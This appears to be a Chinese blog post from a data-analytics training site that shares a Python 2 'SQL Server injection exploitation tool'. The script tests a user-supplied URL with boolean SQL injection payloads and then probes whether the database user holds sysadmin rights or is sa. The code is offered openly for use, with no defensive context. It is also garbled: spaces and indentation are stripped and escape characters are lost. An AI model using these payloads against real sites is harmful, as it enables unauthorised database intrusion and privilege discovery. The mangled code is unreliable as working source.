热线电话:13121318867

登录
首页精彩阅读Python编写检测数据库SA用户的方法
Python编写检测数据库SA用户的方法
2018-02-28
收藏

Python编写检测数据库SA用户的方法

本文讲述一个用Python写的小程序,用于有注入点的链接,以检测当前数据库用户是否为sa,详细代码如下:


# Code by zhaoxiaobu Email: little.bu@hotmail.com 
#-*- coding: UTF-8 -*- 
fromsysimportexit 
fromurllibimporturlopen 
fromstringimportjoin,strip 
fromreimportsearch 
  
defis_sqlable():
  sql1="%20and%201=2"
  sql2="%20and%201=1"
  urlfile1=urlopen(url+sql1)
  urlfile2=urlopen(url+sql2)
  htmlcodes1=urlfile1.read()
  htmlcodes2=urlfile2.read()
  ifnotsearch(judge,htmlcodes1)andsearch(judge,htmlcodes2):
  print"[信息]恭喜!这个URL是有注入漏洞的!n"
  print"[信息]现在判断数据库是否是SQL Server,请耐心等候....." 
  is_SQLServer()
  else:
  print"[错误]你确定这个URL能用?换个别的试试吧!n"
 
defis_SQLServer():
  sql="%20and%20exists%20(select%20*%20from%20sysobjects)"
  urlfile=urlopen(url+sql)
  htmlcodes=urlfile.read()
  ifnotsearch(judge,htmlcodes):
  print"[错误]数据库好像不是SQL Server的!n"
  else:
  print"[信息]确认是SQL Server数据库!n"
  print"[信息]开始检测当前数据库用户权限,请耐心等待......"
  is_sysadmin()
  
  
defis_sysadmin(): 
  sql="%20and%201=(select%20IS_SRVROLEMEMBER('sysadmin'))"
  urlfile=urlopen(url+sql) 
  htmlcodes=urlfile.read() 
  ifnotsearch(judge,htmlcodes): 
    print"[错误]当前数据库用户不具有sysadmin权限!n"
  else: 
    print"[信息]当前数据库用户具有sysadmin权限!n"
    print"[信息]检测当前用户是不是SA,请耐心等待......"
    is_sa() 
  
defis_sa(): 
  sql="%20and%20'sa'=(select%20System_user)";
  urlfile=urlopen(url+sql) 
  htmlcodes=urlfile.read() 
  ifnotsearch(judge,htmlcodes): 
    print"[错误]当前数据库用户不是SA!n"
  else: 
    print"[信息]当前数据库用户是SA!n"
  
print"n########################################################################n" 
print"            ^o^SQL Server注入利用工具^o^     " 
print"           Email: little.bu@hotmail.comn" 
print"========================================================================"; 
url=raw_input('[信息]请输入一个可能有注入漏洞的链接!nURL:') 
ifurl=='': 
  print"[错误]提供的URL必须具有 '.asp?xxx=' 这样的格式" 
  exit(1) 
  
judge=raw_input("[信息]请提供一个判断字符串.n判断字符串:") 
ifjudge=='': 
  print"[错误]判断字符串不能为空!" 
  exit(1) 
  
is_sqlable()




CDA数据分析师考试相关入口一览(建议收藏):

▷ 想报名CDA认证考试,点击>>>   CDA报名 了解CDA考试详情;

▷ 想加入CDA考试题库点击>>> “CDA题库 了解CDA考试详情;

▷ 想学习CDA考试教材,点击>>> “CDA教材” 了解CDA考试详情;

▷ 想查询CDA考试成绩,点击>>> “CDA成绩” 了解CDA考试详情;

▷ 想了解CDA考试含金量,点击>>> “CDA含金量” 了解CDA考试详情;

▷ 想获取CDA考试时间/费用/条件/大纲/通过率点击 >>>“CDA考试官网” 了解CDA考试详情;

SQL

数据分析咨询请扫描二维码

上一篇回归系列(一)| 怎样正确地理解线性回归
下一篇2020美国总统竞选大戏开锣,川普当选的奇迹会再发生吗?
CDA考试动态
CDA报考指南
热门栏目
最新资讯
更多
Copyright © 2015-present 北京国富如荷网络科技有限公司 All Rights Reserved.
京ICP备11001960号-9   京公网安备 11010802034615号   经营许可证编号:京B2-20210330
客服在线
立即咨询